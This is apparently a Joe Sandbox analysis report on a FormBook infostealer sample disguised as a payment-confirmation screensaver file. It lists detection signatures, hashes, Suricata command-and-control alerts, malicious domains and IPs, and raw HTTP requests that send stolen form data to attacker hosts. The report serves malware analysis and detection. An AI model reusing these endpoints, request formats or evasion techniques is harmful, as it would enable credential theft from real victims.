Windows Analysis Report
Payent confirmation copy 00888754087.scr

Overview

General Information

Sample name:	Payent confirmation copy 00888754087.scr
Analysis ID:	1623505
MD5:	4b899b816220949de716a493b223786f
SHA1:	30ead58b9766de4d552bb448be978ac4ea3c9f3e
SHA256:	5a962362db0425ef6552d920519cacfae4fe3f86e8537fae95e44dcb6d1ad981
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Legitimate Application Dropped Archive

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches the installation path of Mozilla Firefox

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Copy From or To System Directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://www.quo1ybjmkhdqljoz.top/ynw5/?5Li4dVwP=ZF/ThatktxT4IEpzG7cEOEQKDl5qXd8mFNyY5ir4FklXSfOpwm6EZv8hiiYfkBo7BOp8Eo5LM5TpY/be/oKrhxeChN5TJBKneWdpD/fpNAQRh0k2tvtFoByt7+at&VtJ=JTIXk8dX64OXShTp	Avira URL Cloud: Label: malware
Source: http://www.quo1ybjmkhdqljoz.top/ynw5/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Payent confirmation copy 00888754087.scr	Virustotal: Detection: 57%			Perma Link
Source: Payent confirmation copy 00888754087.scr	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses 32bit PE files

Source: Payent confirmation copy 00888754087.scr

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payent confirmation copy 00888754087.scr

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: EVew.pdb source: Payent confirmation copy 00888754087.scr
Source:	Binary string: finger.pdb source: RegSvcs.exe, 00000003.00000002.388789742.0000000000834000.00000004.00000020.00020000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000002.866951455.0000000000414000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: EVew.pdbSHA256 source: Payent confirmation copy 00888754087.scr
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.388824636.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.389029493.0000000001F30000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.0000000002240000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.388630935.0000000001DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HP9gbzNVWxqFR.exe, 00000005.00000000.372400998.0000000000A6F000.00000002.00000001.01000000.00000009.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401709637.000000000007F000.00000002.00000001.01000000.0000000A.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49165 -> 104.21.54.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 43.251.56.78:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 43.251.56.78:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 43.251.56.78:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49182 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 209.74.77.230:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49178 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 43.251.56.78:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49185 -> 209.74.77.230:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49191 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49192 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49196 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49195 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49205 -> 111.119.219.195:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49207 -> 104.21.11.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49219 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49197 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49202 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49210 -> 104.21.11.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49216 -> 8.222.228.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49204 -> 111.119.219.195:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49211 -> 157.112.187.77:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49186 -> 209.74.77.230:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49220 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49190 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49214 -> 157.112.187.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49208 -> 104.21.11.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49201 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49215 -> 8.222.228.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49206 -> 111.119.219.195:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49200 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49174 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49193 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49217 -> 8.222.228.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49213 -> 157.112.187.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 209.74.77.230:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49194 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49218 -> 8.222.228.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49199 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49189 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49212 -> 157.112.187.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49209 -> 104.21.11.99:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49198 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49203 -> 111.119.219.195:80

Performs DNS queries to domains with low reputation

Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.lenzor.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.dualbitcoin.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.ethereumkeeper.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.moonavatar.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.blogkart4u.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	DNS query: www.splogi.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 45.33.6.223 45.33.6.223
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SIPL-ASSysconInfowayPvtLtdIN SIPL-ASSysconInfowayPvtLtdIN

Source: C:\Windows\SysWOW64\finger.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3310000[1].zip

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /0pv3/?5Li4dVwP=I6G8DBRKF3PN9Cy6eSQwGAyDdGN/cDdG3kSPGuvbR5esC8dJu2Ef2kcQIbt6EaZSMDCxypqKCunYFMFRIQfdU/urNnrnWs/wzEHQWKTFseNumaFucpwU/BWqadt7&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /2020/sqlite-dll-win32-x86-3310000.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ynw5/?5Li4dVwP=ZF/ThatktxT4IEpzG7cEOEQKDl5qXd8mFNyY5ir4FklXSfOpwm6EZv8hiiYfkBo7BOp8Eo5LM5TpY/be/oKrhxeChN5TJBKneWdpD/fpNAQRh0k2tvtFoByt7+at&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /pknc/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=TsWT+PVJyweInpcuqcRAVrxMIv7dn7P2cuEH07dFoI07yBLnimF2FEtrpE3364l8p3e/PDZf3HpC8OkQkQ5LSQz9jdPhxX19W0a8kd2TAI93AlKVrgcReo5HaD+f HTTP/1.1Host: www.lenzor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /hxn2/?5Li4dVwP=ZV/imptMlgE5kVt5kHU0o4O4tcQA6xECFmm/TGgbqnHG1mgu4lPPPz/ean0zt7O89YX0LhkZHlQmk1AHou5QAwZMyaAlZWiHWzbiDEQq6v3xABUzIQjShnB7ifdL&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.warc.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /qxo2/?5Li4dVwP=o8DmqPI+VqVvnj/m3Ep5ZbXCdv7WCcZ2dVm8WOSQKn+kpW+rBJORlJQWjKKPmEYbP1qOyM3EY1vlLpLVfeIP+aH0F6NJfipveNVVPvCboJX2+lsywWfl6XS7rz+k&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.dualbitcoin.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /shtf/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=FhU37QPUjXoDR/mnXgxIEtz83r1ENt8m3Ft3Wddglnt/yj+Ebcteh0ZFDkUJwOmxlpknkAYCtP36SobD4aBfLUMWPCeFdyDrA6amDitayQW8jkDeTk1K57jxX06f HTTP/1.1Host: www.lifce.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /qkhv/?5Li4dVwP=i51Ixu4M5LOvjs5Z0ddqQXQ5E1Fi1x9FEg8Yva/DYuN1L4sxQPD0mZtOQeSo5cgGL7RFWiV8IGjONF0Yd4fmjQIy1qEAWTMe/urhveEh+mb/hG1w6E9a5F3JJ2qi&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.2y0uoqwoohvdf5vd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /gu37/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=iOl0XSH5CDMOf+V+eoOEKsCb+BMhqZbW7cxb7UU6mqRal+VgoP4cZ+zMwQ9+keLoshpFPIsDQUso6w5zMJEXg5krD1+3LX+lFO1BsIkui72/UxfJL4hroIKhe3Am HTTP/1.1Host: www.ethereumkeeper.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /r9i5/?5Li4dVwP=B8xCi7I3z1WfC3zy5Gez1uzC140fJkw4gGGGLN6Gdudf8KfCBsF2kFe1qI11OIwlnfJY2ngkWUsth2oSw9Rojf+LdLo2Dx9QyT9m9kTAG2XrNZHK+xybqiPO8qg1&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.moonavatar.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /36cg/?5Li4dVwP=c6lcAlso4cwdWdj/XXmo72tXy/48ylF94bq7w+xrmdROEAiOB56qVr/2YdYDhQjBey/p2vWRZnAQFn0r0aT/21GvLN/jduGbC7fAbrbkj9JRjpgLM/b72SNgEYCQ&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /4w1v/?5Li4dVwP=XpAG9fe2pLhJKmhalIu92JQQ9It9VVb0J2u6NTgZVwSRoaiRiOX3MmQPhPLBrMCvNYN6hEdQPGTo1Qufxtt+tn9r4lhbcAvWgNxrAi+bBTu0kuuHxj4+mdjT2ge6&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.xiongding.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /hlq7/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=dKN4O6z/N4DapGrfV/C7O2nEVRSmVfPPG5RCVPQvSrMdLQWk1/Pc9yg0RaCqVVCHUclwHwIYbC5JrD9MUfc58FLQ+Gw/cASq5R5xuOTtHcpssNixd3vu4vq5AdU4 HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /ti21/?5Li4dVwP=WGxoXqct8zJEPhtsiQfMA1dM1LrnIiVaAgo9WLM116GuHzjz/IohkAfryFvNTok9C5aVkdBOP1BmlC339vhztHjO0CSpSPPM9QqrDBcyhH9jsCXUFnpxoEU8b3PA&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.splogi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic	HTTP traffic detected: GET /pzq1/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=oDRqyMa6fuBuz7WlB5xgR/U2R+lw6PRTd5aLt2B5ybsFCSl98v1LfAHtcGvTaF2156e6g8X3X06m8zy7zKxgAqv3o+Bu1jvrOy7C8C4bdHaQ8UWAV+MpBEJPTvre HTTP/1.1Host: www.knowesis.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1

Source: global traffic	DNS traffic detected: DNS query: www.crosspatches.info
Source: global traffic	DNS traffic detected: DNS query: www.sqlite.org
Source: global traffic	DNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
Source: global traffic	DNS traffic detected: DNS query: www.lenzor.xyz
Source: global traffic	DNS traffic detected: DNS query: www.warc.tech
Source: global traffic	DNS traffic detected: DNS query: www.031233720.xyz
Source: global traffic	DNS traffic detected: DNS query: www.dualbitcoin.xyz
Source: global traffic	DNS traffic detected: DNS query: www.lifce.life
Source: global traffic	DNS traffic detected: DNS query: www.2y0uoqwoohvdf5vd.top
Source: global traffic	DNS traffic detected: DNS query: www.ethereumkeeper.xyz
Source: global traffic	DNS traffic detected: DNS query: www.moonavatar.xyz
Source: global traffic	DNS traffic detected: DNS query: www.blogkart4u.xyz
Source: global traffic	DNS traffic detected: DNS query: www.xiongding.tech
Source: global traffic	DNS traffic detected: DNS query: www.savposalore.shop
Source: global traffic	DNS traffic detected: DNS query: www.splogi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.knowesis.app
Source: global traffic	DNS traffic detected: DNS query: www.jingdongpt.shop

Source: unknown

HTTP traffic detected: POST /ynw5/ HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.quo1ybjmkhdqljoz.topReferer: http://www.quo1ybjmkhdqljoz.top/ynw5/Connection: closeCache-Control: no-cacheContent-Length: 2165Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1Data Raw: 35 4c 69 34 64 56 77 50 3d 55 48 58 7a 69 74 35 69 68 6d 6e 75 56 44 70 6d 51 37 6f 47 42 77 30 58 50 6a 70 55 63 50 4d 78 48 50 57 65 77 44 32 53 4c 6d 68 43 49 5a 62 75 35 6e 66 36 58 76 59 64 2f 44 74 6b 6a 42 70 48 49 63 6f 38 59 35 68 56 51 4e 4f 52 5a 4d 7a 2b 78 35 71 77 68 45 6d 2f 6c 4e 46 30 59 52 65 6d 66 6d 6b 71 44 50 43 4a 4c 43 6b 61 6a 46 67 49 74 63 56 50 37 32 47 31 2b 6f 32 6b 48 73 73 79 65 6f 52 54 64 63 42 35 48 57 63 45 61 4d 68 79 79 4a 